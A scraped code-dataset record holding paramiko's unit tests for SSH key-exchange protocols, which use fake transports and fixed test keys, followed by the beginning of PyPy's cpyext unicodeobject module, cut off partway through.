paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CCAC0497CF0ABA1DBF55E1A3995D17F4CC31824B0E8D95CDF8A06F169D050D80" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_10_gex_sha256_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"3DDD2AD840AD095E397BA4D0573972DC60F6461FD38A187CACA6615A5BC8ADBB" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_11_kex_nistp256_client(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = False kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY,), transport._expect ) # fake reply msg = Message() msg.add_string("fake-host-key") Q_S = unhexlify( "<KEY>" ) msg.add_string(Q_S) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY, msg) H = b"BAF7CE243A836037EB5D2221420F35C02B9AB6C957FE3BDE3369307B9612570A" self.assertEqual(K, kex.transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_12_kex_nistp256_server(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = True kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT,), transport._expect ) # fake init msg = Message() Q_C = unhexlify( "043ae159594ba062efa121480e9ef136203fa9ec6b6e1f8723a321c16e62b945f573f3b822258cbcd094b9fa1c125cbfe5f043280893e66863cc0cb4dccbe70210" ) H = b"2EF4957AFD530DD3F05DBEABF68D724FACC060974DA9704F2AEE4C3DE861E7CA" msg.add_string(Q_C) msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT, msg) self.assertEqual(K, transport._K) self.assertTrue(transport._activated) self.assertEqual(H, hexlify(transport._H).upper())
# Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. """ Some unit tests for the key exchange protocols. """ from binascii import hexlify, unhexlify import os import unittest from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import ec import paramiko.util from paramiko.kex_group1 import KexGroup1 from paramiko.kex_gex import KexGex, KexGexSHA256 from paramiko import Message from paramiko.common import byte_chr from paramiko.kex_ecdh_nist import KexNistp256 def dummy_urandom(n): return byte_chr(0xcc) * n def dummy_generate_key_pair(obj): private_key_value = ( 94761803665136558137557783047955027733968423115106677159790289642479432803037 ) public_key_numbers = ( "<KEY>" ) public_key_numbers_obj = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ) obj.P = ec.EllipticCurvePrivateNumbers( private_value=private_key_value, public_numbers=public_key_numbers_obj ).private_key(default_backend()) if obj.transport.server_mode: obj.Q_S = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) return obj.Q_C = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) class FakeKey(object): def __str__(self): return "fake-key" def asbytes(self): return b"fake-key" def sign_ssh_data(self, H): return b"fake-sig" class FakeModulusPack(object): P = ( 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF ) G = 2 def get_modulus(self, min, ask, max): return self.G, self.P class FakeTransport(object): local_version = "SSH-2.0-paramiko_1.0" remote_version = "SSH-2.0-lame" local_kex_init = "local-kex-init" remote_kex_init = "remote-kex-init" def _send_message(self, m): self._message = m def _expect_packet(self, *t): self._expect = t def _set_K_H(self, K, H): self._K = K self._H = H def _verify_key(self, host_key, sig): self._verify = (host_key, sig) def _activate_outbound(self): self._activated = True def _log(self, level, s): pass def get_server_key(self): return FakeKey() def _get_modulus_pack(self): return FakeModulusPack() class KexTest(unittest.TestCase): K = ( 14730343317708716439807310032871972459448364195094179797249681733965528989482751523943515690110179031004049109375612685505881911274101441415545039654102474376472240501616988799699744135291070488314748284283496055223852115360852283821334858541043710301057312858051901453919067023103730011648890038847384890504 ) def setUp(self): self._original_urandom = os.urandom os.urandom = dummy_urandom self._original_generate_key_pair = KexNistp256._generate_key_pair KexNistp256._generate_key_pair = dummy_generate_key_pair def tearDown(self): os.urandom = self._original_urandom KexNistp256._generate_key_pair = self._original_generate_key_pair def test_1_group1_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGroup1(transport) kex.start_kex() x = ( b"1E000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_REPLY,), transport._expect ) # fake "reply" msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_REPLY, msg) H = b"03079780F3D3AD0B3C6DB30C8D21685F367A86D2" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_2_group1_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGroup1(transport) kex.start_kex() self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_INIT,), transport._expect ) msg = Message() msg.add_mpint(69) msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_INIT, msg) H = b"B16BF34DD10945EDE84E9C1EF24A14BFDC843389" x = ( b"1F0000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB<KEY>8D40000000866616B652D736967" ) self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_3_gex_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"<KEY>" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"A265563F2FA87F1A89BF007EE90D58BE2E4A4BD0" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_4_gex_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"807F87B269EF7AC5EC7E75676808776A27D5864C" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_5_gex_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CE754197C21BF3452863B4F44D0B3951F12516EF" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_6_gex_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"B41A06B2E59043CEFC1AE16EC31F1E2D12EC455B" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_7_gex_sha256_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"AD1A9365A67B4496F05594AD1BF656E3CDA0851289A4C1AFF549FEAE50896DF4" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_8_gex_sha256_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"518386608B15891AE5237DEE08DCADDE76A0BCEFCE7F6DB3AD66BC41D256DFE5" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_9_gex_sha256_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CCAC0497CF0ABA1DBF55E1A3995D17F4CC31824B0E8D95CDF8A06F169D050D80" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_10_gex_sha256_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"3DDD2AD840AD095E397BA4D0573972DC60F6461FD38A187CACA6615A5BC8ADBB" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_11_kex_nistp256_client(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = False kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY,), transport._expect ) # fake reply msg = Message() msg.add_string("fake-host-key") Q_S = unhexlify( "<KEY>" ) msg.add_string(Q_S) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY, msg) H = b"BAF7CE243A836037EB5D2221420F35C02B9AB6C957FE3BDE3369307B9612570A" self.assertEqual(K, kex.transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_12_kex_nistp256_server(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = True kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT,), transport._expect ) # fake init msg = Message() Q_C = unhexlify( "043ae159594ba062efa121480e9ef136203fa9ec6b6e1f8723a321c16e62b945f573f3b822258cbcd094b9fa1c125cbfe5f043280893e66863cc0cb4dccbe70210" ) H = b"2EF4957AFD530DD3F05DBEABF68D724FACC060974DA9704F2AEE4C3DE861E7CA" msg.add_string(Q_C) msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT, msg) self.assertEqual(K, transport._K) self.assertTrue(transport._activated) self.assertEqual(H, hexlify(transport._H).upper())
en
0.828808
# Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Some unit tests for the key exchange protocols. # fake "reply" # fake reply # fake init
1.933229
2
pypy/module/cpyext/unicodeobject.py
benoitc/pypy
1
6627886
<gh_stars>1-10 from pypy.interpreter.error import OperationError from pypy.rpython.lltypesystem import rffi, lltype from pypy.rpython.lltypesystem import llmemory from pypy.module.unicodedata import unicodedb from pypy.module.cpyext.api import ( CANNOT_FAIL, Py_ssize_t, build_type_checkers, cpython_api, bootstrap_function, PyObjectFields, cpython_struct, CONST_STRING, CONST_WSTRING) from pypy.module.cpyext.pyerrors import PyErr_BadArgument from pypy.module.cpyext.pyobject import ( PyObject, PyObjectP, Py_DecRef, make_ref, from_ref, track_reference, make_typedescr, get_typedescr) from pypy.module.cpyext.stringobject import PyString_Check from pypy.module.sys.interp_encoding import setdefaultencoding from pypy.objspace.std import unicodeobject, unicodetype, stringtype from pypy.rlib import runicode from pypy.tool.sourcetools import func_renamer import sys ## See comment in stringobject.py. PyUnicodeObjectStruct = lltype.ForwardReference() PyUnicodeObject = lltype.Ptr(PyUnicodeObjectStruct) PyUnicodeObjectFields = (PyObjectFields + (("buffer", rffi.CWCHARP), ("size", Py_ssize_t))) cpython_struct("PyUnicodeObject", PyUnicodeObjectFields, PyUnicodeObjectStruct) @bootstrap_function def init_unicodeobject(space): make_typedescr(space.w_unicode.instancetypedef, basestruct=PyUnicodeObject.TO, attach=unicode_attach, dealloc=unicode_dealloc, realize=unicode_realize) # Buffer for the default encoding (used by PyUnicde_GetDefaultEncoding) DEFAULT_ENCODING_SIZE = 100 default_encoding = lltype.malloc(rffi.CCHARP.TO, DEFAULT_ENCODING_SIZE, flavor='raw', zero=True) PyUnicode_Check, PyUnicode_CheckExact = build_type_checkers("Unicode", "w_unicode") Py_UNICODE = lltype.UniChar def new_empty_unicode(space, length): """ Allocatse a PyUnicodeObject and its buffer, but without a corresponding interpreter object. The buffer may be mutated, until unicode_realize() is called. """ typedescr = get_typedescr(space.w_unicode.instancetypedef) py_obj = typedescr.allocate(space, space.w_unicode) py_uni = rffi.cast(PyUnicodeObject, py_obj) buflen = length + 1 py_uni.c_size = length py_uni.c_buffer = lltype.malloc(rffi.CWCHARP.TO, buflen, flavor='raw', zero=True) return py_uni def unicode_attach(space, py_obj, w_obj): "Fills a newly allocated PyUnicodeObject with a unicode string" py_unicode = rffi.cast(PyUnicodeObject, py_obj) py_unicode.c_size = len(space.unicode_w(w_obj)) py_unicode.c_buffer = lltype.nullptr(rffi.CWCHARP.TO) def unicode_realize(space, py_obj): """ Creates the unicode in the interpreter. The PyUnicodeObject buffer must not be modified after this call. """ py_uni = rffi.cast(PyUnicodeObject, py_obj) s = rffi.wcharpsize2unicode(py_uni.c_buffer, py_uni.c_size) w_obj = space.wrap(s) track_reference(space, py_obj, w_obj) return w_obj @cpython_api([PyObject], lltype.Void, external=False) def unicode_dealloc(space, py_obj): py_unicode = rffi.cast(PyUnicodeObject, py_obj) if py_unicode.c_buffer: lltype.free(py_unicode.c_buffer, flavor="raw") from pypy.module.cpyext.object import PyObject_dealloc PyObject_dealloc(space, py_obj) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISSPACE(space, ch): """Return 1 or 0 depending on whether ch is a whitespace character.""" return unicodedb.isspace(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALPHA(space, ch): """Return 1 or 0 depending on whether ch is an alphabetic character.""" return unicodedb.isalpha(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALNUM(space, ch): """Return 1 or 0 depending on whether ch is an 